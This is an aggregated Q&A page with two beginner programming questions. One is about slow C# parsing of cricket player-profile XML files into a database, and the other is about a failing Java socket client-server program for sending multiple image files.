    I have to load many XML files from internet. But for testing with better speed i downloaded all of them (more than 500 files) of the following format. <player-profile> <personal-information> <id>36</id> <fullname>Adam Gilchrist</fullname> <majorteam>Australia</majorteam> <nickname>Gilchrist</nickname> <shortName>A Gilchrist</shortName> <dateofbirth>Nov 14, 1971</dateofbirth> <battingstyle>Left-hand bat</battingstyle> <bowlingstyle>Right-arm offbreak</bowlingstyle> <role>Wicket-Keeper</role> <teams-played-for>Western Australia, New South Wales, ICC World XI, Deccan Chargers, Australia</teams-played-for> <iplteam>Deccan Chargers</iplteam> </personal-information> <batting-statistics> <odi-stats> <matchtype>ODI</matchtype> <matches>287</matches> <innings>279</innings> <notouts>11</notouts> <runsscored>9619</runsscored> <highestscore>172</highestscore> <ballstaken>9922</ballstaken> <sixes>149</sixes> <fours>1000+</fours> <ducks>0</ducks> <fifties>55</fifties> <catches>417</catches> <stumpings>55</stumpings> <hundreds>16</hundreds> <strikerate>96.95</strikerate> <average>35.89</average> </odi-stats> <test-stats> . . . </test-stats> <t20-stats> . . . </t20-stats> <ipl-stats> . . . </ipl-stats> </batting-statistics> <bowling-statistics> <odi-stats> . . . </odi-stats> <test-stats> . . . </test-stats> <t20-stats> . . . </t20-stats> <ipl-stats> . . . </ipl-stats> </bowling-statistics> </player-profile> I am using XmlNodeList list = _document.SelectNodes("/player-profile/batting-statistics/odi-stats"); And then loop this list with foreach as foreach (XmlNode stats in list) { _btMatchType = GetInnerString(stats, "matchtype"); //it returns null string if node not availible . . . . _btAvg = Convert.ToDouble(stats["average"].InnerText); } Even i am loading all files offline, parsing is very slow Is there any good faster way to parse them? Or is it problem with SQL? I am saving all extracted data from XML to database using DataSets, TableAdapters with insert command. I

    Read the article

  • Java Client-Server problem when sending multiple files

    - by Jim
    Client public void transferImage() { File file = new File(ServerStats.clientFolder); String[] files = file.list(); int numFiles = files.length; boolean done = false; BufferedInputStream bis; BufferedOutputStream bos; int num; byte[] byteArray; long count; long len; Socket socket = null ; while (!done){ try{ socket = new Socket(ServerStats.imgServerName,ServerStats.imgServerPort) ; InputStream inStream = socket.getInputStream() ; OutputStream outStream = socket.getOutputStream() ; System.out.println("Connected to : " + ServerStats.imgServerName); BufferedReader inm = new BufferedReader(new InputStreamReader(inStream)); PrintWriter out = new PrintWriter(outStream, true /* autoFlush */); for (int itor = 0; itor < numFiles; itor++) { String fileName = files[itor]; System.out.println("transfer: " + fileName); File sentFile = new File(fileName); len = sentFile.length(); len++; System.out.println(len); out.println(len); out.println(sentFile); //SENDFILE bis = new BufferedInputStream(new FileInputStream(fileName)); bos = new BufferedOutputStream(socket.getOutputStream( )); byteArray = new byte[1000000]; count = 0; while ( count < len ){ num = bis.read(byteArray); bos.write(byteArray,0,num); count++; } bos.close(); bis.close(); System.out.println("file done: " + itor); } done = true; }catch (Exception e) { System.err.println(e) ; } } } Server public static void main(String[] args) { BufferedInputStream bis; BufferedOutputStream bos; int num; File file = new File(ServerStats.serverFolder); if (!(file.exists())){ file.mkdir(); } try { int i = 1; ServerSocket socket = new ServerSocket(ServerStats.imgServerPort); Socket incoming = socket.accept(); System.out.println("Spawning " + i); try { try{ if (!(file.exists())){ file.mkdir(); } InputStream inStream = incoming.getInputStream(); OutputStream outStream = incoming.getOutputStream(); BufferedReader inm = new BufferedReader(new InputStreamReader(inStream)); PrintWriter out = new PrintWriter(outStream, true /* autoFlush */); String length2 = inm.readLine(); System.out.println(length2); String filename = inm.readLine(); System.out.println("Filename = " + filename); out.println("ACK: Filename received = " + filename); //RECIEVE and WRITE FILE byte[] receivedData = new byte[1000000]; bis = new BufferedInputStream(incoming.getInputStream()); bos = new BufferedOutputStream(new FileOutputStream(ServerStats.serverFolder + "/" + filename)); long length = (long)Integer.parseInt(length2); length++; long counter = 0; while (counter < length){ num = bis.read(receivedData); bos.write(receivedData,0,num); counter ++; } System.out.println(counter); bos.close(); bis.close(); File receivedFile = new File(filename); long receivedLen = receivedFile.length(); out.println("ACK: Length of received file = " + receivedLen); } finally { incoming.close(); } } catch (IOException e){ e.printStackTrace(); } } catch (IOException e1){ e1.printStackTrace(); } } The code is some I found, and I have slightly modified it, but I am having problems transferring multiple images over the server. Output on Client: run ServerQueue.Client Connected to : localhost transfer: Picture 012.jpg 1312743 java.lang.ArrayIndexOutOfBoundsException Connected to : localhost transfer: Picture 012.jpg 1312743 Cant seem to get it to transfer multiple images. But bothsides I think crash or something because the file never finishes transfering

    Read the article

< Previous Page | 257 258 259 260 261 262 263 264 265 266 267 268  | Next Page >